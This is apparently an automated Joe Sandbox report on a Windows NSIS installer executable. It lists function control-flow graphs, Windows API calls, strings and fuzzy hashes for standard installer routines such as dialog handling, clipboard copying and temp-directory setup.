5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                    Executed Functions

                                                                    Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                    • EmptyClipboard.USER32 ref: 00405411
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                    • CloseClipboard.USER32 ref: 0040546E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                                    • API String ID: 2110491804-2409696222
                                                                    • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                    • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                    Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                    APIs
                                                                    • #17.COMCTL32 ref: 004038A2
                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                    • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                    • API String ID: 2435955865-239407132
                                                                    • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                    • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                    Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                    Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                    • String ID:
                                                                    • API String ID: 310444273-0
                                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                    Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                    Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                                    • DestroyWindow.USER32 ref: 004054E6
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
